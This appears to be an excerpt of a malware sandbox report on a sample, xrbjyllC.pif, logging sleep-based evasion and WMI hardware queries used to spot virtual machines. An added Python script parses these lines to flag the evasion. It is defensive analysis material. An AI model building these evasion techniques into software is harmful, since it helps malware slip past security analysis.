Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 594437
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 2941
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 6101
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 1823
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 8024
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 7725
Source: C:\Users\Public\Libraries\xrbjyllC.pif Window / User API: threadDelayed 2129
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144 Thread sleep count: 2941 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599766s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144 Thread sleep count: 6101 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599438s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599313s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599203s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599094s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598969s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598860s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598735s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598610s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598485s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598360s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598222s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -598068s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597946s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597719s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597610s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597485s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597360s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597235s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -597110s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596981s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596767s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596640s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596528s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596416s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596304s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596188s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -596050s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595938s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595810s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595698s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595585s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595249s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -595123s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594911s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594789s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594677s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594564s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594439s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594313s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -594177s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593997s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593860s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593658s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593506s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593369s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593196s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -593011s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -592620s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -592105s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -591918s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -591659s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312 Thread sleep count: 1823 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312 Thread sleep count: 8024 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599124s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -599007s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598780s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598422s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -598062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597719s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597609s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597500s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597391s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597281s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -597062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596734s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596625s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596515s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596406s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596187s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -596078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595932s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595813s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595700s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595579s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595466s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -595016s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594797s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594687s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594469s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428 Thread sleep time: -594125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599889s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -599015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598796s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598686s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598461s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598310s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598185s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -598078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597968s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597859s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597750s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597640s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597531s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597421s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597312s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597203s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -597093s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596981s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596437s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596328s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -596109s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595999s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595890s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -595015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594656s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594546s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456 Thread sleep time: -594437s >= -30000s
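The sleep evidence above, both the "Thread delayed: delay time" lines and the per-TID "Thread sleep time ... >= -30000s" lines (which list the same values, e.g. 599875 appears in both forms), is normally turned into a verdict by hand. The Python below is an added example written for this page; it is not code from the Joe Sandbox report or from the sample. It parses lines in these shapes, treats both forms as milliseconds (an interpretation: the report's 30000 threshold and the value-for-value match between the two forms both point to ms despite the "s" suffix), flags 922337203685477 as an effectively infinite wait (it is Int64.MaxValue in 100-ns ticks expressed in ms), and recognises the descending 600000, 599875, 599766 and so on as a loop that keeps re-sleeping the time remaining until a ten-minute deadline. The sample lines are copied from the report; the sgxIb.exe line is included to show that unrelated evidence is skipped.

```python
import re
from collections import defaultdict

# Int64.MaxValue 100-ns ticks expressed in milliseconds: the value the report
# prints as "delay time: 922337203685477", i.e. a wait that never expires.
INFINITE_MS = (2**63 - 1) // 10_000          # 922337203685477

PIF = r"C:\Users\Public\Libraries\xrbjyllC.pif"

# Constructed sample: evidence lines in the shapes this report uses (values
# copied from the report). The "Jump to behavior" link text is kept on some
# lines on purpose so the parser shows it is ignored.
SAMPLE = r"""
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\xrbjyllC.pif Thread delayed: delay time: 599766
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024 Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144 Thread sleep count: 2941 > 30
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Evasive API call chain: GetLocalTime,DecisionNodes
"""

# Both sleep-time shapes carry the same quantity (milliseconds, see lead-in);
# the "s" suffix is matched as printed, not interpreted as seconds.
DELAY_RE = re.compile(r"^Source: (?P<src>.+?) Thread delayed: delay time: (?P<ms>\d+)")
SLEEP_RE = re.compile(r"^Source: (?P<src>.+?) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s >= -(?P<thr>\d+)s")
COUNT_RE = re.compile(r"^Source: (?P<src>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+) > (?P<thr>\d+)")


def classify(ms, threshold_ms=30_000):
    """Bucket one requested delay using the same 30 s cut-off the report applies."""
    if ms >= INFINITE_MS:
        return "infinite"
    if ms >= threshold_ms:
        return "long"
    return "short"


def countdown_runs(delays, max_step_ms=2_000):
    """Lengths of runs of strictly decreasing delays with small steps.

    A run such as 600000, 599875, 599766 is a loop re-sleeping the time left
    until a fixed deadline (here ten minutes), not independent short sleeps.
    """
    runs, run = [], 1
    for prev, cur in zip(delays, delays[1:]):
        if 0 < prev - cur <= max_step_ms:
            run += 1
        else:
            if run > 1:
                runs.append(run)
            run = 1
    if run > 1:
        runs.append(run)
    return runs


def triage(report_text, threshold_ms=30_000):
    """Summarise sleep-based evasion per (source, tid) from raw evidence lines.

    Lines without a TID ("Thread delayed") are keyed with tid=None.
    """
    per_key = defaultdict(lambda: {"delays": [], "sleep_count": 0})
    for line in report_text.splitlines():
        line = line.replace(" Jump to behavior", "").strip()   # drop the link text
        if m := DELAY_RE.match(line):
            per_key[(m["src"], None)]["delays"].append(int(m["ms"]))
        elif m := SLEEP_RE.match(line):
            per_key[(m["src"], m["tid"])]["delays"].append(int(m["ms"]))
        elif m := COUNT_RE.match(line):
            per_key[(m["src"], m["tid"])]["sleep_count"] = int(m["n"])
    summary = {}
    for key, rec in per_key.items():
        d = rec["delays"]
        finite = [x for x in d if x < INFINITE_MS]
        buckets = [classify(x, threshold_ms) for x in d]
        summary[key] = {
            "n_delays": len(d),
            "infinite_waits": buckets.count("infinite"),
            "long_waits": buckets.count("long"),
            "max_finite_ms": max(finite, default=0),
            "total_finite_ms": sum(finite),
            "countdown_runs": countdown_runs(d),
            "sleep_count": rec["sleep_count"],
            # Either a single over-threshold wait or an excessive number of
            # sleeps (the report's own "> 30" rule) is enough to flag it.
            "evasive": any(b != "short" for b in buckets) or rec["sleep_count"] > 30,
        }
    return summary


if __name__ == "__main__":
    for (src, tid), rec in triage(SAMPLE).items():
        print(f"{src} tid={tid}: {rec}")
```

Run against the full evidence list, the summary shows one effectively infinite wait per thread, a countdown run of several dozen entries starting at 600000 ms, and sleep counts in the thousands for TIDs 4144 and 4312, which is the combination that should make a sandbox extend its run time or patch the sleeps rather than time out at the default window.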
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
